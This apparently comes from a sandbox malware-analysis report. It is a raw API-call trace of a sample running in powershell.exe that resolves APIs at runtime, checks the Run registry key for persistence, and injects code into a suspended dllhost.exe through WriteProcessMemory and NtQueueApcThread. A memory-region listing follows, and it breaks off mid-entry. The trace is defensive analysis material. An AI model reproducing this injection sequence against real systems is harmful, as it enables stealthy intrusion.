0xcb [0091.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0091.125] GetLastError () returned 0xcb [0091.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0091.125] GetLastError () returned 0xcb [0091.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0091.125] GetLastError () returned 0xcb [0091.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0091.125] GetLastError () returned 0xcb [0091.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0091.125] GetLastError () returned 0xcb [0091.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0091.126] GetLastError () returned 0xcb [0091.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0091.126] GetLastError () returned 0xcb [0091.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x50 [0091.126] GetLastError () returned 0xcb [0091.136] GetModuleHandleW (lpModuleName="user32.dll") returned 0x75ba0000 [0091.140] GetProcAddress (hModule=0x75ba0000, lpProcName="CallWindowProcA") returned 0x75bc792f [0091.153] CoCreateGuid (in: pguid=0x60adc54 | out: pguid=0x60adc54*(Data1=0xd5574e9f, Data2=0xdcee, Data3=0x4835, Data4=([0]=0xb9, [1]=0xca, [2]=0x34, [3]=0x4f, [4]=0xd3, [5]=0x32, [6]=0x57, [7]=0x48))) returned 0x0 [0091.154] CoCreateGuid (in: pguid=0x60ae20c | out: pguid=0x60ae20c*(Data1=0x167882d9, Data2=0x3a68, Data3=0x4bda, Data4=([0]=0x9a, [1]=0xe, [2]=0x5b, [3]=0x2e, [4]=0x9b, [5]=0x57, [6]=0x5c, [7]=0xca))) returned 0x0 [0091.166] GetProcAddress (hModule=0x76f00000, lpProcName="VirtualAlloc") returned 0x76f11856 [0091.166] VirtualAlloc (lpAddress=0x0, dwSize=0x232d000, flAllocationType=0x3000, flProtect=0x40) returned 0x60b0000 [0091.168] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76f00000 [0091.168] GetProcAddress (hModule=0x76f00000, lpProcName="GetModuleHandleA") returned 0x76f11245 [0091.168] GetProcAddress (hModule=0x76f00000, lpProcName="GetProcAddress") returned 0x76f11222 [0091.168] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77c60000 [0091.169] GetProcAddress (hModule=0x77c60000, lpProcName="atoi") returned 0x77cad2f3 [0091.169] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75820000 [0091.169] GetProcAddress (hModule=0x75820000, lpProcName=0x10) returned 0x75826b0e [0091.169] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x776e0000 [0091.169] GetProcAddress (hModule=0x776e0000, lpProcName="StrStrA") returned 0x7770c45b [0091.169] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x77370000 [0091.191] GetProcAddress (hModule=0x77370000, lpProcName="InternetCrackUrlA") returned 0x7737d075 [0091.191] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76bf0000 [0091.192] GetProcAddress (hModule=0x76bf0000, lpProcName="UuidCreateSequential") returned 0x76c17c12 [0091.192] LoadLibraryA (lpLibFileName="imagehlp.dll") returned 0x76b00000 [0091.203] GetProcAddress (hModule=0x76b00000, lpProcName="CheckSumMappedFile") returned 0x76b08303 [0091.203] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x75710000 [0091.203] GetProcAddress (hModule=0x75710000, lpProcName="CreateEnvironmentBlock") returned 0x75711a7a [0091.203] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76b50000 [0091.204] GetProcAddress (hModule=0x76b50000, lpProcName="RegCloseKey") returned 0x76b6469d [0091.204] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x77210000 [0091.204] GetProcAddress (hModule=0x77210000, lpProcName="CoInitialize") returned 0x7722b636 [0091.653] VirtualProtect (in: lpAddress=0x60b015f, dwSize=0x78, flNewProtect=0x4, lpflOldProtect=0x60aeaec | out: lpflOldProtect=0x60aeaec*=0x40) returned 1 [0091.653] VirtualProtect (in: lpAddress=0x60b015f, dwSize=0x78, flNewProtect=0x40, lpflOldProtect=0x60aeaec | out: lpflOldProtect=0x60aeaec*=0x4) returned 1 [0091.653] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c60000 [0091.654] GetProcAddress (hModule=0x77c60000, lpProcName="atoi") returned 0x77cad2f3 [0091.654] GetProcAddress (hModule=0x77c60000, lpProcName="sscanf") returned 0x77d354a7 [0091.654] GetProcAddress (hModule=0x77c60000, lpProcName="strncpy") returned 0x77cd5c30 [0091.654] GetProcAddress (hModule=0x77c60000, lpProcName="ZwSetValueKey") returned 0x77c801b4 [0091.655] GetProcAddress (hModule=0x77c60000, lpProcName="ZwQueryValueKey") returned 0x77c7fa98 [0091.655] GetProcAddress (hModule=0x77c60000, lpProcName="ZwQueueApcThread") returned 0x77c7ff14 [0091.655] GetProcAddress (hModule=0x77c60000, lpProcName="ZwCreateKey") returned 0x77c7fb30 [0091.655] GetProcAddress (hModule=0x77c60000, lpProcName="RtlRandom") returned 0x77d298c3 [0091.655] GetProcAddress (hModule=0x77c60000, lpProcName="_snprintf") returned 0x77d34760 [0091.655] GetProcAddress (hModule=0x77c60000, lpProcName="_vsnprintf") returned 0x77cd9d88 [0091.656] GetProcAddress (hModule=0x77c60000, lpProcName="RtlImageNtHeader") returned 0x77c93164 [0091.656] GetProcAddress (hModule=0x77c60000, lpProcName="_chkstk") returned 0x77c9ad68 [0091.656] GetProcAddress (hModule=0x77c60000, lpProcName="memset") returned 0x77c8df20 [0091.656] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x75820000 [0091.656] GetProcAddress (hModule=0x75820000, lpProcName=0x10) returned 0x75826b0e [0091.656] GetProcAddress (hModule=0x75820000, lpProcName=0x73) returned 0x75823ab2 [0091.657] GetProcAddress (hModule=0x75820000, lpProcName=0x3) returned 0x75823918 [0091.657] GetProcAddress (hModule=0x75820000, lpProcName=0x13) returned 0x75826f01 [0091.657] GetProcAddress (hModule=0x75820000, lpProcName=0x4) returned 0x75826bdd [0091.657] GetProcAddress (hModule=0x75820000, lpProcName=0x34) returned 0x75837673 [0091.657] GetProcAddress (hModule=0x75820000, lpProcName=0x17) returned 0x75823eb8 [0091.658] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x776e0000 [0091.658] GetProcAddress (hModule=0x776e0000, lpProcName="StrStrA") returned 0x7770c45b [0091.658] GetProcAddress (hModule=0x776e0000, lpProcName="PathUnquoteSpacesA") returned 0x7770ecc7 [0091.658] GetProcAddress (hModule=0x776e0000, lpProcName="PathFindFileNameA") returned 0x776f00aa [0091.658] GetProcAddress (hModule=0x776e0000, lpProcName="StrCmpNIA") returned 0x776ed11c [0091.659] GetProcAddress (hModule=0x776e0000, lpProcName="StrChrA") returned 0x776ec5e6 [0091.659] GetProcAddress (hModule=0x776e0000, lpProcName="StrStrIA") returned 0x776ed250 [0091.659] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x77370000 [0091.659] GetProcAddress (hModule=0x77370000, lpProcName="InternetCrackUrlA") returned 0x7737d075 [0091.659] GetModuleHandleA (lpModuleName="RPCRT4.dll") returned 0x76bf0000 [0091.660] GetProcAddress (hModule=0x76bf0000, lpProcName="UuidCreateSequential") returned 0x76c17c12 [0091.660] GetModuleHandleA (lpModuleName="imagehlp.dll") returned 0x76b00000 [0091.660] GetProcAddress (hModule=0x76b00000, lpProcName="CheckSumMappedFile") returned 0x76b08303 [0091.660] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x75710000 [0091.660] GetProcAddress (hModule=0x75710000, lpProcName="CreateEnvironmentBlock") returned 0x75711a7a [0091.660] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x76f00000 [0091.661] GetProcAddress (hModule=0x76f00000, lpProcName="ExitThread") returned 0x77cbd598 [0091.661] GetProcAddress (hModule=0x76f00000, lpProcName="ExitProcess") returned 0x76f17a10 [0091.661] GetProcAddress (hModule=0x76f00000, lpProcName="GetModuleFileNameA") returned 0x76f114b1 [0091.661] GetProcAddress (hModule=0x76f00000, lpProcName="CreateEventA") returned 0x76f1328c [0091.661] GetProcAddress (hModule=0x76f00000, lpProcName="TerminateThread") returned 0x76f17a2f [0091.661] GetProcAddress (hModule=0x76f00000, lpProcName="WinExec") returned 0x76f92c21 [0091.662] GetProcAddress (hModule=0x76f00000, lpProcName="WriteFile") returned 0x76f11282 [0091.662] GetProcAddress (hModule=0x76f00000, lpProcName="CreateFileA") returned 0x76f153c6 [0091.662] GetProcAddress (hModule=0x76f00000, lpProcName="GetTempFileNameA") returned 0x76f39d3f [0091.662] GetProcAddress (hModule=0x76f00000, lpProcName="GetTempPathA") returned 0x76f3276c [0091.662] GetProcAddress (hModule=0x76f00000, lpProcName="Sleep") returned 0x76f110ff [0091.663] GetProcAddress (hModule=0x76f00000, lpProcName="TerminateProcess") returned 0x76f2d802 [0091.663] GetProcAddress (hModule=0x76f00000, lpProcName="GetExitCodeThread") returned 0x76f2d5b5 [0091.663] GetProcAddress (hModule=0x76f00000, lpProcName="WaitForSingleObject") returned 0x76f11136 [0091.663] GetProcAddress (hModule=0x76f00000, lpProcName="ResumeThread") returned 0x76f143ef [0091.663] GetProcAddress (hModule=0x76f00000, lpProcName="WriteProcessMemory") returned 0x76f2d9e0 [0091.663] GetProcAddress (hModule=0x76f00000, lpProcName="VirtualAllocEx") returned 0x76f2d9b0 [0091.664] GetProcAddress (hModule=0x76f00000, lpProcName="CreateProcessA") returned 0x76f11072 [0091.664] GetProcAddress (hModule=0x76f00000, lpProcName="ExpandEnvironmentStringsA") returned 0x76f2eb39 [0091.664] GetProcAddress (hModule=0x76f00000, lpProcName="GetTickCount") returned 0x76f1110c [0091.664] GetProcAddress (hModule=0x76f00000, lpProcName="GetVersionExA") returned 0x76f13519 [0091.664] GetProcAddress (hModule=0x76f00000, lpProcName="CloseHandle") returned 0x76f11410 [0091.664] GetProcAddress (hModule=0x76f00000, lpProcName="LoadLibraryA") returned 0x76f149d7 [0091.665] GetProcAddress (hModule=0x76f00000, lpProcName="GetProcAddress") returned 0x76f11222 [0091.665] GetProcAddress (hModule=0x76f00000, lpProcName="lstrcmpiA") returned 0x76f13e8e [0091.665] GetProcAddress (hModule=0x76f00000, lpProcName="GetLastError") returned 0x76f111c0 [0091.665] GetProcAddress (hModule=0x76f00000, lpProcName="GetModuleHandleA") returned 0x76f11245 [0091.665] GetProcAddress (hModule=0x76f00000, lpProcName="VirtualFree") returned 0x76f1186e [0091.665] GetProcAddress (hModule=0x76f00000, lpProcName="VirtualAlloc") returned 0x76f11856 [0091.666] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x76b50000 [0091.666] GetProcAddress (hModule=0x76b50000, lpProcName="RegSetValueExW") returned 0x76b614d6 [0091.666] GetProcAddress (hModule=0x76b50000, lpProcName="RegQueryValueExW") returned 0x76b646ad [0091.666] GetProcAddress (hModule=0x76b50000, lpProcName="RegQueryValueExA") returned 0x76b648ef [0091.666] GetProcAddress (hModule=0x76b50000, lpProcName="RegSetValueExA") returned 0x76b614b3 [0091.666] GetProcAddress (hModule=0x76b50000, lpProcName="RegCreateKeyExA") returned 0x76b61469 [0091.667] GetProcAddress (hModule=0x76b50000, lpProcName="RegCloseKey") returned 0x76b6469d [0091.667] GetProcAddress (hModule=0x76b50000, lpProcName="OpenProcessToken") returned 0x76b64304 [0091.667] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x77210000 [0091.667] GetProcAddress (hModule=0x77210000, lpProcName="CoInitialize") returned 0x7722b636 [0091.667] UuidCreateSequential (in: Uuid=0x60ae9dc | out: Uuid=0x60ae9dc) returned 0x0 [0091.668] _snprintf (in: _Dest=0x83da648, _Count=0x103, _Format="%x%x%x%x%x%x" | out: _Dest="0187481c69") returned 10 [0091.668] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName="0187481c69") returned 0x374 [0091.668] GetLastError () returned 0x0 [0091.668] GetModuleHandleA (lpModuleName=0x0) returned 0x21a70000 [0091.668] GetModuleFileNameA (in: hModule=0x21a70000, lpFilename=0x60ae9f8, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0091.668] StrStrIA (lpFirst="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", lpSrch="powershell.exe") returned="powershell.exe" [0091.668] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x60aeb18 | out: TokenHandle=0x60aeb18*=0x3bc) returned 1 [0091.668] CreateEnvironmentBlock () returned 0x1 [0091.672] CloseHandle (hObject=0x374) returned 1 [0091.672] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0x60ae9dc, lpdwDisposition=0x0 | out: phkResult=0x60ae9dc*=0x374, lpdwDisposition=0x0) returned 0x0 [0091.672] NtCreateKey (in: KeyHandle=0x60ae9e0, DesiredAccess=0xf013f, ObjectAttributes=0x60ae9b8*(Length=0x18, RootDirectory=0x374, ObjectName="\x01", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x60ae9e0*=0x378) returned 0x0 [0091.672] RegQueryValueExA (in: hKey=0x378, lpValueName="f", lpReserved=0x0, lpType=0x0, lpData=0x63b934c, lpcbData=0x60aeb04*=0x0 | out: lpType=0x0, lpData=0x63b934c*=0x0, lpcbData=0x60aeb04*=0x0) returned 0x2 [0091.672] RegCloseKey (hKey=0x378) returned 0x0 [0091.672] RegCloseKey (hKey=0x374) returned 0x0 [0091.672] _alloca_probe () returned 0x60b181a [0091.673] GetModuleHandleA (lpModuleName="kernel32") returned 0x76f00000 [0091.673] GetProcAddress (hModule=0x76f00000, lpProcName="IsWow64Process") returned 0x76f1195e [0091.673] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x60ad97c | out: Wow64Process=0x60ad97c) returned 1 [0091.673] ExpandEnvironmentStringsA (in: lpSrc="%windir%\\syswow64\\dllhost.exe", lpDst=0x60ad98c, nSize=0x1000 | out: lpDst="C:\\Windows\\syswow64\\dllhost.exe") returned 0x20 [0091.673] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\syswow64\\dllhost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x404, lpEnvironment=0x5113300, lpCurrentDirectory=0x0, lpStartupInfo=0x60ae98c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x60ae9d0 | out: lpCommandLine="C:\\Windows\\syswow64\\dllhost.exe", lpProcessInformation=0x60ae9d0*(hProcess=0x378, hThread=0x374, dwProcessId=0x220, dwThreadId=0x26c)) returned 1 [0091.691] VirtualAllocEx (hProcess=0x378, lpAddress=0x0, dwSize=0x3b04, flAllocationType=0x3000, flProtect=0x40) returned 0x60000 [0091.692] WriteProcessMemory (in: hProcess=0x378, lpBaseAddress=0x60000, lpBuffer=0x32e1018*, nSize=0x3b04, lpNumberOfBytesWritten=0x32e2018 | out: lpBuffer=0x32e1018*, lpNumberOfBytesWritten=0x32e2018*=0x3b04) returned 1 [0091.692] NtQueueApcThread (ThreadHandle=0x374, ApcRoutine=0x60000, NormalContext=0x60000, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0091.692] ResumeThread (hThread=0x374) returned 0x1 [0091.692] WaitForSingleObject (hHandle=0x374, dwMilliseconds=0xffffffff) returned 0x0 [0092.205] GetExitCodeThread (in: hThread=0x374, lpExitCode=0x60ae9ec | out: lpExitCode=0x60ae9ec) returned 1 [0092.205] CloseHandle (hObject=0x374) returned 1 [0092.205] ExitProcess (uExitCode=0x2a) Process: id = "7" image_name = "dllhost.exe" filename = "c:\\windows\\syswow64\\dllhost.exe" page_root = "0x710eb000" os_pid = "0x220" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x578" cmd_line = "C:\\Windows\\syswow64\\dllhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4f9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1143 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1144 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1145 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1146 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1147 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1148 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1149 start_va = 0xa50000 end_va = 0xa54fff entry_point = 0xa50000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\SysWOW64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe") Region: id = 1150 start_va = 0x77a80000 end_va = 0x77c28fff entry_point = 0x77a80000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1151 start_va = 0x77c60000 end_va = 0x77ddffff entry_point = 0x77c60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1152 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1153 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1154 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1155 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1156 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1157 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1158 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1159 start_va = 0x60000 end_va = 0x63fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1160 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1161 start_va = 0x74190000 end_va = 0x741ebfff entry_point = 0x741cf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1162 start_va = 0x741f0000 end_va = 0x7422efff entry_point = 0x7421de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1163 start_va = 0x74260000 end_va = 0x74267fff entry_point = 0x742620f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1164 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1165 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1166 start_va = 0x370000 end_va = 0x3d6fff entry_point = 0x370000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1167 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1168 start_va = 0x757b0000 end_va = 0x757bbfff entry_point = 0x757b10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1169 start_va = 0x757c0000 end_va = 0x7581ffff entry_point = 0x757da3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1170 start_va = 0x75860000 end_va = 0x7590bfff entry_point = 0x7586a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1171 start_va = 0x75ba0000 end_va = 0x75c9ffff entry_point = 0x75bbb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1172 start_va = 0x768f0000 end_va = 0x7697ffff entry_point = 0x76906343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1173 start_va = 0x76b40000 end_va = 0x76b49fff entry_point = 0x76b436a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1174 start_va = 0x76b50000 end_va = 0x76beffff entry_point = 0x76b649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1175 start_va = 0x76bf0000 end_va = 0x76cdffff entry_point = 0x76c00569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1176 start_va = 0x76d70000 end_va = 0x76db5fff entry_point = 0x76d77478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1177 start_va = 0x76dc0000 end_va = 0x76e5cfff entry_point = 0x76df3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1178 start_va = 0x76ee0000 end_va = 0x76ef8fff entry_point = 0x76ee4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1179 start_va = 0x76f00000 end_va = 0x7700ffff entry_point = 0x76f132d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1180 start_va = 0x77210000 end_va = 0x7736bfff entry_point = 0x7725ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1181 start_va = 0x77860000 end_va = 0x77959fff entry_point = 0x0 region_type = private name = "private_0x0000000077860000" filename = "" Region: id = 1182 start_va = 0x77960000 end_va = 0x77a7efff entry_point = 0x0 region_type = private name = "private_0x0000000077960000" filename = "" Region: id = 1183 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1184 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1185 start_va = 0x3e0000 end_va = 0x567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1186 start_va = 0x76a00000 end_va = 0x76acbfff entry_point = 0x76a0168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1187 start_va = 0x77470000 end_va = 0x774cffff entry_point = 0x7748158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1188 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1189 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1190 start_va = 0x5b0000 end_va = 0x730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1191 start_va = 0xa60000 end_va = 0x1e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 1192 start_va = 0x1e60000 end_va = 0x418cfff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1193 start_va = 0x75820000 end_va = 0x75854fff entry_point = 0x7582145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1194 start_va = 0x776d0000 end_va = 0x776d5fff entry_point = 0x776d1782 region_type = mapped_file name = 